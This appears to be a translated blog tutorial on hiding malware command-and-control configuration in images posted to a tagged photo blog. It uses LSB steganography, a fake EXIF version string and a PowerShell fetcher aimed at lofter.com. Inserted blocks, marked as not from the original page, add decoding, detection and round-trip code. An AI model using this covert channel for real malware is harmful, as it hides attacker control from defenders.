Misuse image blogs for C&C configuration


0x00 Background

A few months ago I read an article about the Russian Hammertoss malware, which uses Twitter as its C&C service. Abuse of TechNet in a similar way has also been reported [1]. Thinking this through, I concluded that using images (or other formats) as a steganographic carrier for C&C control commands is more covert, and the amount of information carried is far larger than Twitter's 140-character limit.

Some image blogs keep the original images users upload and let users add tags (hashtags) to them; the images under a tag can be fetched through a fixed URL. This way you can not only embed hidden information but also quickly locate the image in question. When the controller needs to change the configuration (for example, when the IP address changes), it only has to log on to the social network and upload a new image carrying the command to complete the update. Flexible and covert.

In this example the simplest steganographic method is used: embedding the C&C information in the least significant bits. Interested readers can implement other watermarking algorithms themselves. A popular Chinese image-blog service is used for demonstration only.

0x01 Steganography Principle

The idea of embedding hidden information in the LSB is simple. Choose a 24-bit bitmap without an alpha channel as the carrier. Each pixel has three colour components, R, G and B, each ranging from 0x00 to 0xFF, i.e. 8 binary bits, so a pixel can represent 16777216 colours.

For each colour channel, only the lowest bit is modified while the remaining seven bits stay unchanged, so the difference is too small for the naked eye to distinguish. As the figure shows, the two colour blocks look almost identical.

This opens up space for information inside the pixels. By embedding information in the least significant bit, each pixel can carry 3 bits, that is, 2^3 = 8 states.

0x02 Image Blending

To embed arbitrary binary data, the original data must first be pre-encoded so that one byte maps to several pixels. There happens to be an encoding that fits: base64, which turns binary data into 64 printable symbols, using = at the end for length alignment. 64 is exactly 2^6, precisely the amount of information two pixels can hold in their least significant bits.

Since the length of the C&C command is not fixed, an extra field is needed to record it. One can imitate IE's BSTR and put the length of the whole array in its first element, or store it in the image metadata, such as EXIF.

Data placed directly in EXIF is too easy to discover, so I designed an algorithm that encodes a small positive integer into a string that looks very much like a software version. The "version number" is then placed in the Software field of the EXIF data, where it does not look out of place.

The encoding is very simple. Take the square root of n and round down to get e. Convert n into base e and collect its digits, least significant first, into an array a; put e at the front of the array; join the elements with decimal points to get the string s; reverse s to get the "version number". For example, with n = 1992 the square root rounded down gives e = 44, and 1992 in base 44 is 1992 = 1*44^2 + 1*44^1 + 12*44^0, so the array is [44, 12, 1, 1]. Joining and reversing the characters gives 1.1.21.44; put a made-up software name in front of it and it looks just like a version number......

#!python
def fakever(n):
  # yield floor(sqrt(n)) as the base, then the base-e digits of n, least significant first
  def nums(num):
    base = int(num ** 0.5)
    yield base
    while num:
      yield num % base
      num //= base
  # n < 4 would give a base of 0 or 1, so use the short form "n.1" instead
  ver = map(str, nums(n)) if n >= 4 else (str(n), '1')
  # join with dots and reverse the characters so it no longer reads as a number sequence
  return '.'.join(ver)[::-1]
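The encoder above has to be inverted on the receiving side, where the number recovered from the EXIF Software field tells the extractor how many symbols to pull out of the pixels; the same inverse also gives an analyst a cheap triage check on image metadata. The following is an added example, not code from the page or from the lowershell project: fakever is reproduced from above so the block runs stand-alone, while parsever and looks_like_fakever are names invented here, and the Software values in the comments are constructed samples.

```python
import re

def fakever(n):
    """Encoder as given on the page: n -> fake 'version number' string."""
    def nums(num):
        base = int(num ** 0.5)
        yield base
        while num:
            yield num % base
            num //= base
    ver = map(str, nums(n)) if n >= 4 else (str(n), '1')
    return '.'.join(ver)[::-1]

def parsever(s):
    """Inverse of fakever. Returns n, or None when s is not consistent with the encoding."""
    parts = s[::-1].split('.')                      # undo the character reversal
    if len(parts) < 2 or not all(p.isdigit() for p in parts):
        return None
    base, digits = int(parts[0]), [int(p) for p in parts[1:]]
    if len(parts) == 2 and parts[1] == '1' and base < 4:
        return base                                 # short form the encoder uses for n < 4
    if base < 2 or digits[-1] == 0 or any(d >= base for d in digits):
        return None                                 # bad base, leading zero digit or digit out of range
    n = sum(d * base ** i for i, d in enumerate(digits))   # digits are least significant first
    # the encoder derives the base as int(n ** 0.5); anything else cannot have come from it
    return n if int(n ** 0.5) == base else None

VERSION_RE = re.compile(r'(\d+(?:\.\d+)+)\s*$')

def looks_like_fakever(software_field):
    """Triage heuristic for an EXIF Software value, e.g. 'FooCam 1.1.21.44' (constructed sample).
    True when the trailing dotted number decodes consistently under the fakever scheme.
    Genuine versions can collide (for example '1.0.0.2' decodes to 4), so a hit is a lead, not proof."""
    m = VERSION_RE.search(software_field)
    return m is not None and parsever(m.group(1)) is not None
```

parsever relies on the string reversal being an exact involution: a digit such as 12 appears as "21" in the fake version and is restored before parsing. The consistency test (base must equal int(sqrt(n))) is what rejects most real version strings, since ordinary versions rarely satisfy it.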

Use the PIL library to embed configurations into images. The basic process is as follows:

1. Read the C&C configuration and base64-encode it into 64 symbols, corresponding to the values 0x00-0x40.
2. Read the image and convert its colour mode to RGB.
3. Take every two pixels as a group and embed one symbol per group.
4. Encode the length of the embedded data into the so-called "version number" and write it into the EXIF data.

Although PIL image objects provide putpixel and getpixel methods to operate on a single pixel, both are inefficient when processing many pixels in batch. The better approach is to convert the image into a pixel array with the tobytes method of the PIL Image object and modify the array's values directly.

For the complete code, see github.com/ChiChou/lowershell/steg.py.

Note that the output file must be a lossless format such as PNG or BMP; PNG is recommended. Lossy formats such as JPEG discard pixel information, and the data can then no longer be extracted completely.

Register a throwaway account, upload the blended image to the social network, and give it a tag.

0x04 Extracting Hidden Information

On the "malware" side, obtaining the C&C configuration only requires requesting a page of the social network site, parsing the HTML to get the original image URL, and finally downloading the image and decoding the hidden information. This article demonstrates it in PowerShell: with .NET's HTML parsing and image processing facilities, the hidden information can be recovered easily.

The PowerShell Invoke-WebRequest cmdlet sends an HTTP request and returns an object for the page whose parsed HTML can be traversed as a DOM tree. For example, the Images property returns all image elements on the page.

Take a Chinese image blog as an example. To get the original image URLs of the images tagged "world", one line is enough:

#!powershell
# keep only <img> elements that carry a data-origin attribute and strip the thumbnail-resizing query string
(Invoke-WebRequest 'http://www.lofter.com/tag/world').Images | where {$_.'data-origin'} | % {$_.'data-origin' -replace "\?imageView.*$"}

One of the big advantages of PowerShell is that it can call the .NET Framework directly. .NET's System.Drawing assembly provides bitmap processing, with which both pixel data and EXIF data can be read.

Information extraction is the reverse of the embedding process:

1. Read the EXIF data and work out the length of the payload (the C&C configuration file).
2. Take every two pixels as a group and extract their least significant bits, which together form one symbol.
3. Map the symbols back to a base64 string and decode it to obtain the original hidden data.

As with PIL, the fastest way to access pixels in .NET is to operate on an array directly. Use the LockBits method of the Bitmap object to lock the whole bitmap area read-only, then use Marshal to copy the pixel data into a byte array; working on the array instead of on individual pixels is much faster.

#!powershell
$rect = [System.Drawing.Rectangle]::FromLTRB(0, 0, $img.Width, $img.Height)
$mode = [System.Drawing.Imaging.ImageLockMode]::ReadOnly
$format = [System.Drawing.Imaging.PixelFormat]::Format32bppArgb
# lock the bitmap in its own pixel format ($format above is left unused)
$data = $img.LockBits($rect, $mode, $img.PixelFormat)
# Stride is the byte length of one row including any padding, so Stride * Height covers the whole buffer
$size = [Math]::Abs($data.Stride) * $img.Height
$pixels = New-Object Byte[] $size
[System.Runtime.InteropServices.Marshal]::Copy($data.Scan0, $pixels, 0, $size)  # copy into the buffer
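The embedding steps in 0x02 and the extraction steps above are mirror images, and both depend on the byte layout of the pixel buffer: PIL's tobytes on an RGB image gives packed R,G,B triples, while .NET's LockBits hands back B,G,R (or B,G,R,A) with each row padded out to Stride bytes. The following is an added Python example, not code from the page or from the lowershell project, that performs the whole round trip on a constructed pixel buffer under both layouts and checks that only the lowest bit of any byte changed. The layout dictionaries PIL_RGB and NET_BGR24, the functions embed, extract and roundtrip, the sample configuration and the pseudo-random "photo" bytes are all inventions of this example.

```python
import base64
import random

B64 = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Pixel-buffer layouts assumed here (not the project's API):
#   PIL_RGB   - Image.tobytes() on an RGB image: 3 bytes/pixel, R,G,B, rows packed
#   NET_BGR24 - LockBits on Format24bppRgb: 3 bytes/pixel, B,G,R, rows padded to a 4-byte Stride
# chan lists the byte offsets of the colour channels in the order R, G, B.
PIL_RGB = dict(bpp=3, chan=(0, 1, 2), pad=1)
NET_BGR24 = dict(bpp=3, chan=(2, 1, 0), pad=4)

def stride(width, layout):
    """Bytes per row, rounded up to the layout's padding boundary."""
    return -(-width * layout["bpp"] // layout["pad"]) * layout["pad"]

def pixel_offsets(width, height, layout):
    """Byte offset of every pixel in scan order, skipping row padding."""
    row = stride(width, layout)
    for y in range(height):
        for x in range(width):
            yield y * row + x * layout["bpp"]

def payload_to_symbols(data):
    """base64 without '=' padding; each symbol becomes a 6-bit value 0..63."""
    return [B64.index(c) for c in base64.b64encode(data).rstrip(b"=")]

def symbols_to_payload(symbols):
    """Map 6-bit values back to base64 text, restore the padding and decode."""
    enc = bytes(B64[s] for s in symbols)
    return base64.b64decode(enc + b"=" * (-len(enc) % 4))

def embed(buf, width, height, layout, symbols):
    """Write each symbol into the LSBs of two pixels (3 channels x 2 pixels = 6 bits).
    Only the lowest bit of each colour byte changes. Returns the symbol count to store in EXIF."""
    if 2 * len(symbols) > width * height:
        raise ValueError("carrier holds %d pixels, %d needed" % (width * height, 2 * len(symbols)))
    offs = pixel_offsets(width, height, layout)
    for sym in symbols:
        bits = [(sym >> i) & 1 for i in range(5, -1, -1)]                 # MSB first
        slots = [(px, ch) for px in (next(offs), next(offs)) for ch in layout["chan"]]
        for (px, ch), bit in zip(slots, bits):
            buf[px + ch] = (buf[px + ch] & 0xFE) | bit
    return len(symbols)

def extract(buf, width, height, layout, count):
    """Read `count` symbols back; `count` is what the EXIF 'version number' decodes to."""
    if 2 * count > width * height:
        raise ValueError("length field exceeds carrier capacity")
    offs = pixel_offsets(width, height, layout)
    symbols = []
    for _ in range(count):
        slots = [(px, ch) for px in (next(offs), next(offs)) for ch in layout["chan"]]
        sym = 0
        for px, ch in slots:
            sym = (sym << 1) | (buf[px + ch] & 1)
        symbols.append(sym)
    return symbols

def make_carrier(width, height, layout, seed=7):
    """Constructed 'photo': deterministic pseudo-random bytes sized for the layout."""
    rng = random.Random(seed)
    return bytearray(rng.randrange(256) for _ in range(stride(width, layout) * height))

def roundtrip(layout, width=16, height=8):
    """Embed a constructed config, extract it with the same layout, and report
    (recovered == original, largest per-byte change, symbol count)."""
    config = b'{"host": "203.0.113.10", "port": 443}'   # constructed sample (RFC 5737 address)
    original = make_carrier(width, height, layout)
    carrier = bytearray(original)
    count = embed(carrier, width, height, layout, payload_to_symbols(config))
    recovered = symbols_to_payload(extract(carrier, width, height, layout, count))
    max_delta = max(abs(a - b) for a, b in zip(original, carrier))
    return recovered == config, max_delta, count

if __name__ == "__main__":
    for name, layout in (("PIL_RGB", PIL_RGB), ("NET_BGR24", NET_BGR24)):
        print(name, roundtrip(layout, width=5, height=20))
```

Running an extractor with the wrong layout (packed RGB offsets against a padded BGR buffer) yields garbage rather than an error, which is why the receiver must derive channel order and Stride from the bitmap it actually locked instead of assuming the embedder's layout. The capacity check in embed is what forces the "suitable image size" requirement mentioned later in the article.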

For the complete code, see Github.com/ChiChou/lowershell/server/Lib/Steg.ps1.

The example project also implements an encrypted ICMP reverse shell, which is outside the scope of this article and is omitted here.

0x05 Results

First, prepare an image of suitable size: too small and it cannot hold the data, too large and it is inconvenient to transmit over the network.

Run python steg.py example.config.json IMG_7495.jpg blend.png

The synthesized image is as follows:

At a glance it looks no different. Upload it with #ThisIsAnUniqueSecretTag as the tag, then run the PowerShell script on another machine; the configuration file example.config.json is read back completely.

0x06 Conclusion

Steganography has long been used in malware as a means of covert communication. This article proposes and implements a method of issuing C&C control commands by misusing image social-media sites, for conceptual demonstration and discussion only.

0x07 References

[1] FireEye, Microsoft wipe TechNet clean of malware hidden by hackers
[2] Wikipedia: Steganography
